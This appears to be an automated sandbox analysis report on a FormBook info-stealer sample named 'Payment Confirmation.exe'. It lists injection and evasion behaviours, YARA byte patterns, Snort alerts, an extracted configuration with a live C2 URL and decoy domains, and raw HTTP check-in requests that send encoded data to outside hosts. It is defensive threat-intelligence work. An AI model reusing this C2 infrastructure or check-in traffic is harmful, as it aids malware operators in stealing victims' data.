Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Confirmation.exe

Overview

General Information

Sample Name:Payment Confirmation.exe
Analysis ID:502129
MD5:98ffc3c812e6cec919ebd286973e2002
SHA1:b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256:014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Payment Confirmation.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
    • Payment Confirmation.exe (PID: 5440 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1516 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 4852 cmdline: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x6af8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.1.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Confirmation.exeVirustotal: Detection: 24%Perma Link
          Source: Payment Confirmation.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.thesewhitevvalls.comVirustotal: Detection: 6%Perma Link
          Machine Learning detection for sampleShow sources
          Source: Payment Confirmation.exeJoe Sandbox ML: detected
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.msiexec.exe.49f796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.1.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Payment Confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00405E93 FindFirstFileA,FindClose,1_2_00405E93
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004054BD
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402671 FindFirstFileA,1_2_00402671

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.thesewhitevvalls.com/b2c0/
          Source: Joe Sandbox ViewASN Name: ASIANETGB ASIANETGB
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.206.159.80 52.206.159.80
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:21 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Oct 2021 14:32:26 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:42 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
